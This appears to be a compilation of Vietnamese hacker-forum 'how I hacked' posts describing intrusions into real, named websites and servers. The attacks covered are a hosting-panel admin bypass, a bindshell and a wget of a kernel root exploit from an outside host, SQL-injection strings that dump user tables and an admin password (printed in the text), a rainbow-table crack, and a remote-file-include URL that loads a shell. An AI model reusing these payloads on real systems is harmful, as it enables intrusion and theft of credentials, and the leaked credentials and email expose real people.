-Làm cách nào để login với quyền "Host admin" đây!. -> Sau khi ta đã login với Account bình thường -> run file "dsp_newreseller.asp" ngay trên trình duyệt mới vừa login với link http://[
Trang 1-Làm cách nào để login với quyền "Host admin" đây ! -> rất đơn giản !
-> Sau khi ta đã login với Account bình thường -> run file "dsp_newreseller.asp" ngay trên trình duyệt mới vừa login với link
http://[target]/admin/hosting/dsp_newreseller.asp "!
-> sau đó run trở lại với link " http://[target]/admin/ " ngay trên trình duyệt này luôn !
-> hic ! nó bắt ta login lại ! -> làm sao đây -> hãy bình tĩnh , đây chính là chổ che
mờ mắt ta đây ! -> hay gõ lai link như sau : "http://[target]/admin/main.asp"
-> điều thú vị đã xãy ra -> " Host Admin : Hcadmin "
- Hết phần II -
- // KeHieuHoc - HCE Group \\ -
how i getroot yokto.de
Bỏ qua làm thế nào tui có shell trên server đó , vì nó nằm ngoài phạm vi bài viết info của server
bindshell lên server 66.29.6.213 , port :11457
bindshell thành công :
getroot : thấy kernel "Linux yokto.de 2.4.20 #1 Fri Oct 24 10:31:56 CEST 2003 i686 unknown" , chắc chắn dính 1 đống bug lên www.milw0rm.com tìm xem
chọn 1 cái trong list :http://sirhungnguyen.net/kernel/
tui chọn local24
wget lên server :
Trích:
wget http://sirhungnguyen.net/local24
Trang 2và run nó
rooted , va` end game
killua(HCE)
Tôi đã "hack" diendantudodanchu như thế nào
Ok, hôm nay viết cái tut cho mọi người tham khảo chút:
- Đầu tiên thì thử thăm dò xem sao:
Trích:
http://www.whois.net/?d=www.diendantudodanchu.net
http://www.domaintools.com/reverse-i tudodanchu.net
- Thu được:
Trích:
Host: bluehost.com
IP: 70.103.189.64 (share cho 992 hosts)
Domain mua tại: planetdomain.com
Email: farmbaby@gmail.com
- Có thể thấy khả năng local là không thể, thứ nhất bluehost secure rất kỹ, thứ hai
họ phân host theo số box, ở đây site này nằm tại box64
- Tuy nhiên site này dùng nuke, mà nuke thì bug ra liên tục
- Ok, vào search đánh vào:
Trích:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
- Ok, dính bug, thu được hash
- Tiếp theo tìm cách fake, tuy nhiên cookie bị mã hóa, tính sao giờ
- Xem ra phải crack cái hash kia
- Open rainbow, gõ vào:
Trích:
C:\>rcrack G:\md5table\*.rt -f pass.txt
- Crack thành công
- Login
- Up shell
Vnrekcah(vniss)
Trang 3Nhà xuất bản chính trị quốc gia
Ngồi learn get root oải quá lang thang tự nhiên lòi ra thằng này Nhìn nó nghi nghi thế là check SQL thử - Hi.c cái này bình thường ko có gì bà con đừng có chửi nha Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074'
thêm đại dấu ' vô he biết ngay mà nhìn đã thấy nghi rồi
Code:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''
/SCart/cart.asp, line 76
Hí làm gì giờ nhỉ thử lấy column xem nào ^.^
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and
%201=convert(int,(select%20top%201%20table_name%20from%20information_s
chema.columns%20where%20table_name%20not%20in%20(%20''))) sp_password
được gì thế này
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Address' to a column of data type int /SCart/cart.asp, line 76
thế là lòi ra rồi he he tiếp tục query ta được một đống sau
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and
%201=convert(int,(select%20top%201%20table_name%20from%20information_s chema.columns%20where%20table_name%20not%20in%20(%20'Address','AlsoP urchased','Authors','BEGInventory','BEGPayables','BEGReceivables','BEGReceiva bles','Books','Categories','Contacts','Customers','DiscountRate','NewsTopics','News Sources','Orders','PayablesTrack','PaymentType','ReceivablesTrack','SachDBchuaT
Trang 4G','SachDBcoTG','Sales','Search','Session','Settings','Stores','sysconstraints','sysseg ments','TaxRate','Test','dtproperties','Employees','Inventory','InventoryDetails','Inve ntoryTrack','ItemAuthor','ItemAuthorKeyword','ItemCategory','Items','ItemSubject Keyword','ItemSubjectKeyword','ItemTitleKeyword','ItemType','ItemWineryKeyw ord','Keywords','News','TheLoaiSach','TransactionDetails','vwAccounts','Wineries', 'Wines'))) sp_password
Nhìn cái vwAccounts thấy nghi nghi nhưng hok có pass admin T.T Hóa ra nó nằm
ở Customers
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and
%201=convert(int,(select%20top%201%20column_name%20from%20information _schema.columns%20where%20table_name='customers'%20AND%20column_na me%20not%20in%20('PKId','Alias','Password','CustomerName','AddressId','Email' ,'LastSale','TotalSaleYTD','Balance','Category','CreditRating','CreditLimit'))) sp_password
Cứ từ từ mà soi là ta lại được những table kia ^.^ Customname kìa hihi Password kìa ^.^
thế mà làm mình soi cái này mới ức chứ
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and
%201=convert(int,(select%20top%201%20column_name%20from%20information _schema.columns%20where%20table_name='Orders'%20AND%20column_name
%20not%20in%20('PKId','CustomerId','EmployeeId','OtherStoreId','StoreId','Suppl ierId','OrderType','OrderStatus','OrderDate','PickupDate','ShippingHandling','ShipT oName',%20'ShipToAddressId'))) sp_password
hè hè bây giờ ta lấy password thôi
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%2%co nvert(int,(select top 1 CustomerName%2b'/'%2bPassword from Customers)) sp_password
Hè hè ra Đào Ngọc Đạt/NgocDat là name và pass của admin >Sướng nhá Nhưng
mà vẫn chưa thấy link login đâu cả Lười check thôi thì đoán vậy
login không phải , thử nguoiquantri không phải Khôpng biết Admin có để link login vô ko nhỉ Đang chán thế nào tay lại đánh thêm vào url dòng admin thế là nó lòi ngay ra Hic kể ra cũng có lúc ngu thật
Code:
http://www.nxbctqg.org.vn/admin
Trang 5Ô nhưng sao thế này nó đòi ID để login T.T Thử đại cái usename Đào Ngọc Đạt không được hehe lại phải đi soi típ rùi Nhưng mà đói rùi anh em vô check nha thế mới vui ^.^ Đi ăn cơm cái đã Chú ý mấy cái table có ID đằng sau anh em nha The end : Đã báo admin Không phá hoại gì Lạy chúa tha tội con thờ Phật cơ T.T
Kecodoc(HCE)
how i hacked nhactre.biz !
<?vnforce
/*
####################################
## site: nhactre.biz ##
## server: 62.214.98.162 ##
## -Method: Local attack ##
## trình bày: black_hat_cr @ VnForce Team ##
## (c) HcEgRoUp.net ##
## Chia sẽ để được chia sẽ ! ##
####################################
*/
1, Tìm cách cho 1 con shell lên server, nhưng bằng cách nào ?
Scan server
scanning to drsownrx.com
drsownrx.com/template1/template1.php
Code:
http://drsownrx.com/template1/template1.php?load=feature009
->
Code:
http://drsownrx.com/template1/template1.php?load=vnforce
hiện ra lỗi:
Code:
Warning: main(vnforce.inc): failed to open stream: No such file or directory in
/mounted-storage/home19b/sub001/sc19679-TTZP/DrsOwnRx.com/template1/template1.php on line 31
hehehe trời giúp ta ! include vào liền:
/template1/template1.php?load=http://aznatc.info/w/navaro.txt?
nr57 từ từ hiện ra bước 1 và bước quan trọng nhất đã xong
Trích: